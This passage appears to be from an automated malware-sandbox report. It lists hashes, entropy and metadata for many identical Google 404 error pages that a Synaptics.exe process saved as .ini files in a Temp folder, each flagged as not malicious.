                                                                                                                                                                                  SHA-256:45D6A6778798B866A9F6FAE0AFF56F830B0A5287B92D1427CC49848D8555BA65
                                                                                                                                                                                  SHA-512:5818916C2A588F7AFDDA057F0F6B2216EE584D324F540036DF62172B4FD0881F10E481A754871BD3CEB6BAC20209AFA315AF213266C434078CFD26E9D6719F94
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="smGC56G3QCl5k51p-I7DSw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\gx9xpGX.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.260252120177658
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                                                                  MD5:8BF83FDC03C225A35B8131187746BDD9
                                                                                                                                                                                  SHA1:FB71ED63C4A04134BD7403A224081453AA482EAD
                                                                                                                                                                                  SHA-256:ED6A791988A89E3EBA08C1FD3CC125E34128BC4877F5B1F7635C035F81412DC9
                                                                                                                                                                                  SHA-512:FF13270F3DF79C50381ED2B89C4D32F72EE5A3E1A6288DF60A625EBDCAFB6500940D83577107B1FBE44DDA8680189A77323012BB7E953B230F08420AB2445000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="o9nJtVdVziu5Jr0FS4JXNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\iXREjEi.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.2750271110807185
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0UJSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/+pAZewRDK4mW
                                                                                                                                                                                  MD5:BD8658B6150D8235A9EFCBDFCF3A878F
                                                                                                                                                                                  SHA1:EF31F16C72862741A002665937FE458B9F79773F
                                                                                                                                                                                  SHA-256:BFD044AEBF6A5FD226617E4BAFAD8C5D6F9DBA68B438B5E709937909AF841662
                                                                                                                                                                                  SHA-512:EAD0A9F5746B4F1FEA71C0CD8A38985EE17A23A55E7ED6EBBA4DAE883FA25530137867D6BA817E6CF80910A85BC02BD0980CDC537C5F509761CE8C2468D97D3F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZCm8WYXJJH6hVtgHAWzulg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\j94rEGQ.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.252918712765758
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0ubmqSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+lmq+pAZewRDK4mW
                                                                                                                                                                                  MD5:880B5534CFBCD7D6E1E1D1554C4759EF
                                                                                                                                                                                  SHA1:4C74A5A62E367D728A06EBE445424E61E9462C24
                                                                                                                                                                                  SHA-256:2C97CBD560AB2790573349D574D619249DB7B2C60252637F3610CB78C6FA3E2B
                                                                                                                                                                                  SHA-512:152A775A6CD6003F9BAE28394F52438B87D51F0C9B9D81971B28BF6CBDEB8ECEE70DE4C383F9BFC9EA9E11041DBE77CD9C8391949799551283DF2BE0054DD47E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dm0GzyUbiZvWabpwUq5mTA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\kF4EOV6.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.275096381626906
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0SHSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/H+pAZewRDK4mW
                                                                                                                                                                                  MD5:E5110E1B88322AB13F3ACC7E636CC7FB
                                                                                                                                                                                  SHA1:E924F1D328C42AEE64A9A8E7278E731BB9365A69
                                                                                                                                                                                  SHA-256:885D829B0A6F859A6B217C2DDFE8B494E559617EB20ADFA52967D1C928022D85
                                                                                                                                                                                  SHA-512:E938450300B5C40F9172B6EBF7E502571C5AC648B520D3159ADC7AB2C34B15926CAF3B24C99FFAD1D09DDEFF308F34F7EDFD9BF44CF48B477422F3BAD9DBB2C5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MD2Bh5C2jG3HpS7zE9wKWg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\lEQ2Lzd.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.251362315069304
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0uddSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Tdd+pAZewRDK4mW
                                                                                                                                                                                  MD5:6A3FF437C43BEEB9690D6E3063148A38
                                                                                                                                                                                  SHA1:2AD2A614775E73B89B09508815CBF6F1A85E705B
                                                                                                                                                                                  SHA-256:200340A54BBFA567EE4E5E54452840441ACD1EC1414861DAE7A468E01595B32D
                                                                                                                                                                                  SHA-512:77CC4F6C7FDA83EEED74612EFDDE3E32F2461659BCC170A32D8805F66E0F3C99A4CECF2380599E878F768024AE7E026AB2252EAF27D2AE090430F598ADB313FB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ncOoFFv4vu5EeO41yzlhvA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nKtiXTO.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.268260472345902
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0xDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+m+pAZewRDK4mW
                                                                                                                                                                                  MD5:BA9FE8B5AB6C246FB5480C9639BAACB3
                                                                                                                                                                                  SHA1:4CCB632C8DAD6AB67E826A3D19CBB5D811338D30
                                                                                                                                                                                  SHA-256:2EA4798FF78DB179A576F035B6B391CABCFAEDFB498E997D84B0435C15FF25BE
                                                                                                                                                                                  SHA-512:4A83EC71F7393CB9C3DAC647D8D2DBFB10120A2C802FD2EF48A03D47C53AA1FCD408E43D63B43A1EAA0BDD50960F9FC81F9F58447ABB8939F4D9E450EFB71047
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Q81wvQW4qBrOv8KuKxpXSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\p6d8xIQ.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.2470314151950355
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0NQ7bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r7b+pAZewRDK4mW
                                                                                                                                                                                  MD5:21088DFA17D1014DB4432E22E1B75F91
                                                                                                                                                                                  SHA1:866E400A59F068F66C07797CE07DD96A62D3F890
                                                                                                                                                                                  SHA-256:E32EFEF18B9A5333A4417E71481A9F758D27EC4E2D746958D8BF40D954E8718A
                                                                                                                                                                                  SHA-512:0269654578CB4DA23036C64AEA8934D8FA9CFDE3D706CAA06F661C3FFAA2230617C899558CC068E7F27A378DFDADF366D964A94CD7B39B1B73A6E8F432A4F06D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IYvqbR_a9eibltbh7K-i8g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\pYTfBPN.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.259832808579026
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0J4ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+zI+pAZewRDK4mW
                                                                                                                                                                                  MD5:058651D296EB8F6E844E87B477D5DB5B
                                                                                                                                                                                  SHA1:FA47A4D30D8055ADAA92091C290D1930E91CC77B
                                                                                                                                                                                  SHA-256:1A5DA6D81EF08643E146A9D60F99B3E09725D64E580F95C39958C0D0350F460B
                                                                                                                                                                                  SHA-512:3E3711778545AA85C5AABF5A2078E8DE7A983998C17D58C1551C38C0BACEF72D2E9F0FA15B5E00E04F1D403EC35D10D9B28D4B6683AC3551CE8BE01F3F840B7D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-igXCtGLFNubdz3fLAHeVg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\pqWj6nn.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.258949985488316
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                                                                                  MD5:581948B41AEFA4404ED067A54842FB7A
                                                                                                                                                                                  SHA1:DA0F7EA07ABDE9AB08A795780DBB28F7285EB975
                                                                                                                                                                                  SHA-256:39534F774F02896F861A44680987D5F79E48ACFDE85E88D4BC6D1F1D350A3286
                                                                                                                                                                                  SHA-512:B1DF3108F8C97FF1D5ECE7AAF55FE8DCA3BE980317053298DE15DD915EA1466930C9ECBDCFF62CC675B9890878A20EEB91FF3CB95BC15D79379C0AD1750EB1C2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="J8YS1Qpl59bccH2H8GUntw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\qVMSPpW.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.263451430173214
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0eSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+d+pAZewRDK4mW
                                                                                                                                                                                  MD5:2B08A10AE1AABBBC49B54045FF8F18F5
                                                                                                                                                                                  SHA1:2222725B4363462122D6025933D50690F23453FD
                                                                                                                                                                                  SHA-256:9B72F76E9DB1E607BE0BAD569983EED12B973C535C03FC3B9D51316DDA6E6387
                                                                                                                                                                                  SHA-512:18C4EBDBCA137F16901C425B34396168FD6081ADEC2B9E687BA21E765DC21935627A6C50F8837906553A25ABEBAE4ADD199F3BFE9B91E05B0C39DD36C7173E4C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4qtW8f7Q-Crs3jvOUhFoIg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\qjNtMDu.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.261941853920202
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                                                                                                                  MD5:A3F49E6049C9F3086F6D9E16B39B6CA5
                                                                                                                                                                                  SHA1:792685DC9AB246FC617915BB7803B280F1709338
                                                                                                                                                                                  SHA-256:F1BDB35BF1B49B5ED6555EED70EB900D7802DFB542AA57F3680399BFC13382D8
                                                                                                                                                                                  SHA-512:90BB4924466602B1715523B2837F39EBEB3B783A274853E4A6EFD38C1AE8D02C7A2EB1DC254F2B37384829DBD8B1F3DC0D5D1D5A1B9AF8847B535957409EEBA1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="biG23JCTSL4EwdEDKkLarw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\rRs2uiB.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.252620806736683
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0xBwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Qw+pAZewRDK4mW
                                                                                                                                                                                  MD5:1558C8ABBE902BF83A5D702CB9650AF1
                                                                                                                                                                                  SHA1:15DED422BFEC4FDA60D7BA32FADE5E78E59CC1E4
                                                                                                                                                                                  SHA-256:0380260BD74EC7D6FF53EA16CF01F7808D139714968A39803B310EC6F73E48D0
                                                                                                                                                                                  SHA-512:5C82CE297E86B8E0F3EE6A9AB9F1B59943521ADCC5E86E9CCAE37F81153151580B3FFEACB7B6DC91BFE6B3B291E930A4CCC665B0E38CA3D436E8B19B21A86474
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xeYhTa4XTpGE51uixuQFIg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tAHtiuU.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.263049397807206
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:GgsF+0NASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+V+pAZewRDK4mW
                                                                                                                                                                                  MD5:AD6C7B12998E1F23DD909C12ABE4AAA6
                                                                                                                                                                                  SHA1:410355A02890645F3BF222C5D1573E375F31DDD4
                                                                                                                                                                                  SHA-256:6432CC86E9FC3C255D48A0B864DE2B3074F66AB8CACDA4E1445763B920425359
                                                                                                                                                                                  SHA-512:D85D2375F021F7AEE6F55D592407F4F52976A0DB800CA55731F3097F452A8AFEBBF135E57244978B1C48BB4AAAFC56D949185B0D51279D790EEE716ADFF801E2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HHr-JOyohoH0MbPZ_OkQNg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\tc67qJM.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1652
                                                                                                                                                                                  Entropy (8bit):5.261357912358924
                                                                                                                                                                                  Encrypted:false
